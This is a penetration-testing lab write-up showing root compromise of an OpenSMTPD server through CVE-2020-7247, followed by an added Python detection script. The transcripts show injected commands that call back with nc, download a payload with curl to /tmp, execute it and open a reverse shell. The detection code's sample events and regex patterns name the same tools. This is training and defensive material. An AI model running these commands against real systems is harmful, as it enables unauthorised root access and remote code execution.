CVE-2020-7247
The target SMTP server runs an outdated instance of OpenSMTPD, which is vulnerable to CVE-2020-7247.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ python3 CVE-2020-7247.py $IP 25 'nc 192.168.45.192 445'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
Testing the outbound connection
Got the connection back.
The OpenSMTPD instance is running with the privileges of the root account.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ python3 CVE-2020-7247.py $IP 25 'curl 192.168.45.192/shell -o /tmp/shell'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
http:// appears to be truncated, so I had to omit it.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ python3 CVE-2020-7247.py $IP 25 'chmod 755 /tmp/shell; /tmp/shell'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done
Invoking the reverse shell
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/bratarina]
└─$ nnc 445
listening on [any] 445 ...
connect to [192.168.45.192] from (UNKNOWN) [192.168.132.71] 39134
whoami
root
hostname
bratarina
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:50:56:9e:25:71 brd ff:ff:ff:ff:ff:ff
inet 192.168.132.71/24 brd 192.168.132.255 scope global ens160
valid_lft forever preferred_lft forever
Initial foothold established on the target system as the root account by exploiting CVE-2020-7247.
System-level compromise
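As an added detection-side example (not part of this writeup), the following Python script flags command execution that descends from the OpenSMTPD daemon, which is exactly the footprint the exploitation above leaves on the host: nc calling back out, curl writing to /tmp, then chmod and execution of the dropped file. It assumes process-execution records carrying pid, ppid, comm and cmdline (as auditd EXECVE records or an EDR feed would supply), that the daemon's process name is smtpd, and that the mda is spawned through sh -c; the sample events, their pids and the mail.local delivery line are constructed for this example, with the command lines taken from the transcript above.

```python
"""Detection example: flag network tools and scratch-directory execution
spawned beneath the OpenSMTPD daemon (smtpd)."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-execution record, e.g. from auditd EXECVE or an EDR feed."""
    pid: int
    ppid: int
    comm: str      # short executable name as the kernel reports it
    cmdline: str   # full command line


# Tools a mail daemon has no business spawning. The list is an assumption
# for this example, drawn from the commands in the writeup; extend it for
# your own estate.
TOOL_RE = re.compile(r"(?:^|[\s;|&'\"(])(?:nc|ncat|netcat|curl|wget)(?=$|[\s'\")])")
# Any reference to a file in a world-writable scratch directory.
SCRATCH_RE = re.compile(r"(?:^|[\s'\"=])(?:/tmp|/var/tmp|/dev/shm)/\S*")

# Constructed sample events: pids and tree shape are invented, the command
# lines are the ones the exploit script ran on the target above.
SAMPLE_EVENTS = [
    ProcEvent(612, 1, "smtpd", "smtpd"),
    ProcEvent(6130, 612, "sh", "sh -c 'nc 192.168.45.192 445'"),
    ProcEvent(6131, 6130, "nc", "nc 192.168.45.192 445"),
    ProcEvent(6140, 612, "sh", "sh -c 'curl 192.168.45.192/shell -o /tmp/shell'"),
    ProcEvent(6141, 6140, "curl", "curl 192.168.45.192/shell -o /tmp/shell"),
    ProcEvent(6150, 612, "sh", "sh -c 'chmod 755 /tmp/shell; /tmp/shell'"),
    ProcEvent(6151, 6150, "chmod", "chmod 755 /tmp/shell"),
    ProcEvent(6152, 6150, "shell", "/tmp/shell"),
    # Benign noise: an admin's curl under sshd must not fire.
    ProcEvent(900, 1, "sshd", "sshd"),
    ProcEvent(901, 900, "bash", "bash"),
    ProcEvent(902, 901, "curl", "curl https://example.com"),
    # Benign local delivery under smtpd (constructed) must not fire either.
    ProcEvent(6160, 612, "mail.local", "/usr/libexec/mail.local -f alice@example.com bob"),
]


def ancestors(event: ProcEvent, by_pid: dict) -> list:
    """Comm names of the parent chain, nearest first; stops at an unknown
    pid or a cycle (pid reuse can otherwise loop forever)."""
    chain, seen, ppid = [], set(), event.ppid
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        parent = by_pid[ppid]
        chain.append(parent.comm)
        ppid = parent.ppid
    return chain


def classify(event: ProcEvent):
    """Why this command line is suspicious on its own, or None."""
    if TOOL_RE.search(event.cmdline):
        return "network tool"
    if SCRATCH_RE.search(event.cmdline):
        return "scratch-dir file"
    return None


def detect(events, daemon: str = "smtpd") -> list:
    """Return (pid, reason) for every suspicious event whose ancestry
    includes the mail daemon."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        reason = classify(e)
        if reason and daemon in ancestors(e, by_pid):
            findings.append((e.pid, f"{reason} under {daemon}: {e.cmdline}"))
    return findings


if __name__ == "__main__":
    for pid, reason in detect(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} {reason}")
```

Legitimate local delivery also runs beneath smtpd, so the rule keys on the tool names and scratch paths rather than on the mere fact that the daemon spawned a child; both the sh -c wrapper and the tool it launches are reported, which is deliberate, since the wrapper's command line carries the full injected string. Tune TOOL_RE and SCRATCH_RE to the tooling that is normal on your mail hosts.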